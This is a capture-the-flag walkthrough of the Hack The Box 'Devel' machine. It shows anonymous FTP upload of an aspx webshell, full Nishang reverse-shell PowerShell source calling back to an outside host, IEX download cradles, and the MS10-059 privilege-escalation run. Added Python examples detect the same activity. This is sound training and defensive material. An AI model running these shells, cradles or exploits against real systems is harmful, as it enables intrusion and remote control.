htb-devel-nl

Today we are going to solve another CTF challenge, "Devel", which is categorised as a retired lab presented by Hack The Box for online penetration-testing practice. The challenges in this lab are very easy to complete, even for beginners.

Level: Beginners

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are accessible online, they have static IPs. The IP of Devel is 10.10.10.5, so let's start with nmap port enumeration.

root@kali:~/htb/devel# nmap -sC 10.10.10.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-27 18:44 CET
Nmap scan report for 10.10.10.5
Host is up (0.027s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 01-24-19 07:42PM 2834 devel.aspx
| 01-27-19 10:59AM 2859 file.aspx
| 01-26-19 11:41AM 2857 gay.aspx
| 03-17-17 04:37PM 689 iisstart.htm
| 01-25-19 12:47PM 2877 mshell.aspx
| 01-26-19 11:46AM 0 nogay.aspx
| 01-26-19 11:42PM 2876 task.aspx
| 01-27-19 08:10AM 6 test.html
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst: 
|_ SYST: Windows_NT
80/tcp open http
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-title: IIS7

Nmap done: 1 IP address (1 host up) scanned in 24.69 seconds

Using anonymous login credentials, we successfully gain access to the FTP server on port 21.

root@kali:~/htb/devel# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
01-24-19  07:42PM                 2834 devel.aspx
01-27-19  10:59AM                 2859 file.aspx
01-26-19  11:41AM                 2857 gay.aspx
03-17-17  04:37PM                  689 iisstart.htm
01-25-19  12:47PM                 2877 mshell.aspx
01-26-19  11:46AM                    0 nogay.aspx
01-26-19  11:42PM                 2876 task.aspx
01-27-19  08:10AM                    6 test.html
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> bin
200 Type set to I.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2817 bytes sent in 0.00 secs (47.1316 MB/s)
ftp>

We can see that an aspnet_client directory is present, so the FTP root is most likely the IIS webroot. We try to upload an aspx webshell from the /usr/share/webshells/aspx folder on our Kali Linux machine.

This allows us to run system commands as the web server. We can now see more information about the system.
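
The foothold on this box is a misconfiguration rather than an exploit: an anonymously writable FTP root that is also the IIS webroot. As an added example (not part of the original writeup), the Python below parses the `ftp> ls` listing from above, checks whether the directory looks like an IIS webroot, and lists server-executable files that are not part of the default IIS 7 content. The baseline set and the list of script extensions are assumptions for the example.

```python
import re
from datetime import datetime

# Constructed input: the anonymous FTP listing exactly as `ftp> ls` printed it on
# this box, so the check can be run offline against realistic data.
FTP_LISTING = """\
03-18-17  01:06AM       <DIR>          aspnet_client
01-24-19  07:42PM                 2834 devel.aspx
01-27-19  10:59AM                 2859 file.aspx
01-26-19  11:41AM                 2857 gay.aspx
03-17-17  04:37PM                  689 iisstart.htm
01-25-19  12:47PM                 2877 mshell.aspx
01-26-19  11:46AM                    0 nogay.aspx
01-26-19  11:42PM                 2876 task.aspx
01-27-19  08:10AM                    6 test.html
03-17-17  04:37PM               184946 welcome.png
"""

# Content a fresh IIS 7 Default Web Site ships with (assumed baseline; in practice
# use the site's real deployment manifest).
IIS_DEFAULT_CONTENT = {"aspnet_client", "iisstart.htm", "welcome.png"}

# Extensions IIS hands to a script engine: a writable webroot plus any of these
# equals code execution as the application pool identity.
SERVER_EXECUTABLE = {".aspx", ".asp", ".ashx", ".asmx"}

# MS-DOS style listing: date, time, <DIR> or size, name.
LINE_RE = re.compile(
    r"^(\d{2}-\d{2}-\d{2})\s+(\d{2}:\d{2}[AP]M)\s+(<DIR>|\d+)\s+(\S.*)$"
)


def parse_listing(text):
    """Turn MS-DOS style FTP directory lines into dicts (name, is_dir, size, mtime)."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip FTP status lines such as '226 Transfer complete.'
        date, clock, size, name = m.groups()
        entries.append({
            "name": name,
            "is_dir": size == "<DIR>",
            "size": 0 if size == "<DIR>" else int(size),
            "mtime": datetime.strptime(f"{date} {clock}", "%m-%d-%y %I:%M%p"),
        })
    return entries


def looks_like_webroot(entries):
    """The FTP root doubling as the IIS webroot is the real misconfiguration."""
    names = {e["name"].lower() for e in entries}
    return "iisstart.htm" in names or "aspnet_client" in names


def suspicious_uploads(entries):
    """Server-executable files that are not in the baseline, oldest first."""
    hits = [
        e for e in entries
        if not e["is_dir"]
        and e["name"].lower() not in IIS_DEFAULT_CONTENT
        and any(e["name"].lower().endswith(ext) for ext in SERVER_EXECUTABLE)
    ]
    return [e["name"] for e in sorted(hits, key=lambda e: e["mtime"])]


def audit(text):
    entries = parse_listing(text)
    return {
        "webroot_exposed": looks_like_webroot(entries),
        "suspicious": suspicious_uploads(entries),
    }


if __name__ == "__main__":
    report = audit(FTP_LISTING)
    print("FTP root is the IIS webroot:", report["webroot_exposed"])
    for name in report["suspicious"]:
        print("possible web shell:", name)
```

Run against the listing above, every .aspx file is flagged (six of them, the earliest being devel.aspx from 24 January), while test.html and the default IIS content are not. The fix on a real host is to stop anonymous write access to the FTP site and to keep the FTP root separate from the webroot.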

Without wasting time, we used puckieshell443.ps1, which is based on Nishang's Invoke-PowerShellTcp:

function Invoke-PowerShellTcp 
{ 
  
    [CmdletBinding(DefaultParameterSetName="reverse")] Param(

        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
        [String]
        $IPAddress,

        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
        [Int]
        $Port,

        [Parameter(ParameterSetName="reverse")]
        [Switch]
        $Reverse,

        [Parameter(ParameterSetName="bind")]
        [Switch]
        $Bind

    )

    
    try 
    {
        #Connect back if the reverse switch is used.
        if ($Reverse)
        {
            $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
        }

        #Bind to the provided port if Bind switch is used.
        if ($Bind)
        {
            $listener = [System.Net.Sockets.TcpListener]$Port
            $listener.start()    
            $client = $listener.AcceptTcpClient()
        } 

        $stream = $client.GetStream()
        [byte[]]$bytes = 0..65535|%{0}

        #Send back current username and computername
        $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
        $stream.Write($sendbytes,0,$sendbytes.Length)

        #Show an interactive PowerShell prompt
        $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
        $stream.Write($sendbytes,0,$sendbytes.Length)

        while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
        {
            $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
            $data = $EncodedText.GetString($bytes,0, $i)
            try
            {
                #Execute the command on the target.
                $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
            }
            catch
            {
                Write-Warning "Something went wrong with execution of command on the target." 
                Write-Error $_
            }
            $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
            $x = ($error[0] | Out-String)
            $error.clear()
            $sendback2 = $sendback2 + $x

            #Return the results
            $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
            $stream.Write($sendbyte,0,$sendbyte.Length)
            $stream.Flush()  
        }
        $client.Close()
        if ($listener)
        {
            $listener.Stop()
        }
    }
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." 
        Write-Error $_
    }
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.15 -Port 443

Then transfer the puckieshell443.ps1 file to the victim's system:

c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.5 - - [06/Feb/2019 15:05:51] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.15/puckieshell443.ps1')
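
The one-liner above is a classic PowerShell download cradle: fetch a script over HTTP and hand it straight to Invoke-Expression. With script block logging enabled (Event ID 4104) it is very visible. As an added example (not part of the original writeup), the Python below scores constructed 4104 script-block texts, two of which are the commands used on this box; the pattern lists and scoring thresholds are assumptions for the example.

```python
import re

# Constructed Event ID 4104 (PowerShell script block) texts. The first two are the
# commands used on this box; the others are benign admin activity for contrast.
SCRIPT_BLOCKS = [
    "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.15/puckieshell443.ps1')",
    "(new-object net.webclient).downloadfile('http://10.10.14.20/MS10-059.exe', 'C:\\windows\\temp\\MS10-059.exe')",
    "Get-ChildItem C:\\Windows\\Temp | Sort-Object LastWriteTime",
    "Invoke-WebRequest -Uri https://www.microsoft.com/ -OutFile index.html",
]

# Primitives that fetch content from the network.
DOWNLOAD_RE = re.compile(
    r"new-object\s+(?:system\.)?net\.webclient|downloadstring|downloadfile|"
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b",
    re.IGNORECASE,
)
# Primitives that run a string as code; download + this = a download cradle.
EXECUTE_RE = re.compile(r"\biex\b|invoke-expression", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
RAW_IP_URL_RE = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/", re.IGNORECASE)


def classify(block):
    """Return a finding dict for one script block, or None if it downloads nothing."""
    if not DOWNLOAD_RE.search(block):
        return None
    urls = URL_RE.findall(block)
    score, reasons = 1, ["fetches content from the network"]
    if EXECUTE_RE.search(block):
        score += 2
        reasons.append("feeds the download straight into Invoke-Expression (cradle)")
    if any(RAW_IP_URL_RE.match(u) for u in urls):
        score += 1
        reasons.append("URL addresses a raw IP rather than a hostname")
    if any(u.lower().startswith("http://") for u in urls):
        score += 1
        reasons.append("cleartext HTTP")
    severity = "high" if score >= 4 else "medium" if score >= 2 else "low"
    return {"severity": severity, "urls": urls, "reasons": reasons}


def scan(blocks):
    """(index, finding) for every block that touches the network."""
    findings = []
    for i, block in enumerate(blocks):
        finding = classify(block)
        if finding is not None:
            findings.append((i, finding))
    return findings


if __name__ == "__main__":
    for i, f in scan(SCRIPT_BLOCKS):
        print(f"[{f['severity']}] block {i}: {'; '.join(f['reasons'])} -> {f['urls']}")
```

The cradle used here scores high (download, Invoke-Expression, raw IP, cleartext HTTP), the later DownloadFile of MS10-059.exe scores medium, and an Invoke-WebRequest to an HTTPS hostname is only low, so the rule surfaces the interesting activity without burying it in ordinary administration.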

Now it is time to execute our shell through the web browser, as shown in the image below.

http://10.10.10.5/cmdpuck.aspx


After executing the uploaded backdoor file, go back to the Netcat listener and wait for the session.

c:\PENTEST>nc -lvp 443
listening on [any] 443 ...
10.10.10.5: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.5] 49163: NO_DATA
Windows PowerShell running as user DEVEL$ on DEVEL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>whoami
iis apppool\web
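
The shell arrives as the application pool identity (iis apppool\web), which means the IIS worker process w3wp.exe spawned cmd.exe and PowerShell and that PowerShell then opened an outbound connection on port 443. Neither is normal behaviour for a web worker. As an added example (not part of the original writeup), the Python below runs two detection rules over constructed Sysmon-style process and network events modelled on this session; PIDs, paths and the benign events are constructed for the example.

```python
import ntpath

# Interpreters and shells a web worker process has no business launching.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
W3WP = "w3wp.exe"

# Constructed Sysmon-style events (process creation and network connection).
# The 10.10.14.15:443 destination mirrors the listener used on this box; PIDs,
# the database connection and the admin session are made up for contrast.
EVENTS = [
    {"type": "process", "pid": 2380, "parent_pid": 900,
     "image": r"C:\Windows\System32\inetsrv\w3wp.exe", "user": r"IIS APPPOOL\Web"},
    {"type": "process", "pid": 3012, "parent_pid": 2380,
     "image": r"C:\Windows\System32\cmd.exe", "user": r"IIS APPPOOL\Web"},
    {"type": "process", "pid": 3044, "parent_pid": 3012,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "user": r"IIS APPPOOL\Web"},
    {"type": "network", "pid": 3044,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "user": r"IIS APPPOOL\Web", "initiated": True,
     "dest_ip": "10.10.14.15", "dest_port": 443},
    # Benign: the worker process itself talking to a back-end database.
    {"type": "network", "pid": 2380, "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "user": r"IIS APPPOOL\Web", "initiated": True,
     "dest_ip": "10.10.10.50", "dest_port": 1433},
    # Benign: an administrator's interactive PowerShell (constructed account name).
    {"type": "process", "pid": 5120, "parent_pid": 5000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "user": r"DEVEL\localadmin"},
]


def basename(path):
    return ntpath.basename(path).lower()


def build_tree(events):
    """pid -> (parent_pid, image) from the process creation events."""
    return {e["pid"]: (e.get("parent_pid"), e["image"])
            for e in events if e["type"] == "process"}


def descends_from_w3wp(pid, tree):
    """Walk the ancestry: attackers often interpose cmd.exe between w3wp and powershell."""
    seen = set()
    while pid in tree and pid not in seen:
        seen.add(pid)
        parent_pid, _ = tree[pid]
        if parent_pid in tree and basename(tree[parent_pid][1]) == W3WP:
            return True
        pid = parent_pid
    return False


def detect(events):
    """Return (rule, pid) alerts for shells under IIS and app-pool shells calling out."""
    tree = build_tree(events)
    alerts = []
    for e in events:
        img = basename(e["image"])
        if e["type"] == "process" and img in SHELLS and descends_from_w3wp(e["pid"], tree):
            alerts.append(("shell spawned under IIS worker process", e["pid"]))
        if (e["type"] == "network" and e.get("initiated")
                and e["user"].upper().startswith("IIS APPPOOL\\") and img in SHELLS):
            alerts.append(("app-pool identity shell making outbound connection", e["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"ALERT pid={pid}: {rule}")
```

On the sample data both cmd.exe and the PowerShell it launched are flagged by the ancestry rule, and the PowerShell is flagged again for the outbound connection, while the worker's own database connection and the administrator's shell stay quiet.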

Then I run Sherlock, a post-exploitation script that checks the host for missing patches:

PS C:\windows\temp> iex(new-object net.webclient).downloadstring('http://10.10.14.15/Sherlock.ps1')


Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Appears Vulnerable

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable
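
Read from the defender's side, the Sherlock output above is a list of bulletins that were never installed on this Windows 7 host. As an added example (not part of the original writeup), the Python below parses that record format into structured data, keeps only the items marked "Appears Vulnerable", and produces the bulletin and CVE lists a patch team would work from. The fourth "Not Vulnerable" record is constructed to show the filtering.

```python
import re

# Constructed input: the three records Sherlock printed on this box, plus one
# constructed "Not Vulnerable" record (placeholder identifiers) to exercise the filter.
SHERLOCK_OUTPUT = """
Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Appears Vulnerable

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : Placeholder patched item (constructed)
MSBulletin : MS00-000
CVEID      : 2000-0000
Link       : https://example.invalid/
VulnStatus : Not Vulnerable
"""

FIELD_RE = re.compile(r"^(\w+)\s*:\s*(.*)$")
CVE_RE = re.compile(r"(?:CVE-)?(\d{4}-\d{4,})")


def parse_sherlock(text):
    """Split the output into records (blank-line separated 'Key : Value' blocks)."""
    records, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        m = FIELD_RE.match(line)
        if m:
            current[m.group(1)] = m.group(2).strip()
    if current:
        records.append(current)
    # Normalise the bare "2010-0232" form Sherlock prints into canonical CVE IDs.
    for r in records:
        r["CVEs"] = ["CVE-" + c for c in CVE_RE.findall(r.get("CVEID", ""))]
    return records


def missing_patches(records):
    """Bulletins Sherlock believes are not installed, in bulletin order."""
    return sorted(r["MSBulletin"] for r in records
                  if r.get("VulnStatus") == "Appears Vulnerable")


def cves_to_remediate(records):
    """Deduplicated CVE list covered by the missing bulletins."""
    return sorted({c for r in records
                   if r.get("VulnStatus") == "Appears Vulnerable" for c in r["CVEs"]})


if __name__ == "__main__":
    recs = parse_sherlock(SHERLOCK_OUTPUT)
    print("Missing bulletins:", ", ".join(missing_patches(recs)))
    print("CVEs:", ", ".join(cves_to_remediate(recs)))
```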

We run Windows Exploit Suggester against the systeminfo output and note that this machine is vulnerable to MS10-059 and MS11-046.

https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS10-059/MS10-059.exe
c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.5 - - [06/Feb/2019 19:23:11] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
10.10.10.5 - - [06/Feb/2019 19:30:21] "GET /MS10-059.exe HTTP/1.1" 200 -
PS C:\windows\temp> (new-object net.webclient).downloadfile('http://10.10.14.20/MS10-059.exe', 'C:\windows\temp\MS10-059.exe')
PS C:\windows\temp> dir MS10-059.exe


    Directory: C:\windows\temp


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         10/2/2019   3:37 ??      51434 lp.exe
-a---         10/2/2019   4:24 ??     784384 MS10-059.exe

PS C:\windows\temp> ./MS10-059.exe 10.10.14.20 9876

/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>

Wonderful!! We have completed the task and hacked this box.

C:\Users\jacco>nc -lvp 9876
listening on [any] 9876 ...
10.10.10.5: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.5] 49170: NO_DATA
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\users\public>whoami
whoami
nt authority\system
c:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e62*****b4b


PS C:\windows\temp> (New-Object System.Net.WebClient).DownloadFile("http://10.10.14.20/MS10-015.zip", "C:\Windows\Temp\MS10-015.zip")

A simple way of using ExtractToDirectory from System.IO.Compression.ZipFile:

# Load the .NET ZipFile class (not available by default in Windows PowerShell).
Add-Type -AssemblyName System.IO.Compression.FileSystem

# Extract $ziparchive into $extractpath; the directory is created if needed.
function unzip {
    param( [string]$ziparchive, [string]$extractpath )
    [System.IO.Compression.ZipFile]::ExtractToDirectory( $ziparchive, $extractpath )
}

unzip "D:\file.zip" "C:\temp"


Author: Puckiestyle
